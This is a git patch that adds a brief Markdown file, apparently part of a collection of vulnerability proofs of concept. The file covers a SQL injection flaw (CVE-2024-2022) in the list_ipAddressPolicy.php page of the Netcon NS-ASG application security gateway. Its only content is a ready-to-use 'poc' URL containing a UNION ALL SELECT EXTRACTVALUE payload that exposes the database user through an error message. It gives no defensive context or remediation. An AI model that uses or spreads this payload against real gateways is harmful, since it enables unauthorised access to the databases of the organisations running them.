From 5c3996ebe8bf80c3c73e9003ba7b7e6052914fac Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 12 Mar 2024 18:40:37 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=BD=91=E5=BA=B7=E7=A7=91=E6=8A=80NS?= =?UTF-8?q?-ASG=E5=BA=94=E7=94=A8=E5=AE=89=E5=85=A8=E7=BD=91=E5=85=B3list?= =?UTF-8?q?=5FipAddressPolicy.php=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E(CVE-2024-2022).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md diff --git a/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md b/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md new file mode 100644 index 0000000..998e492 --- /dev/null +++ b/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md @@ -0,0 +1,7 @@ +## 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022) + + +## poc +``` +/admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) +```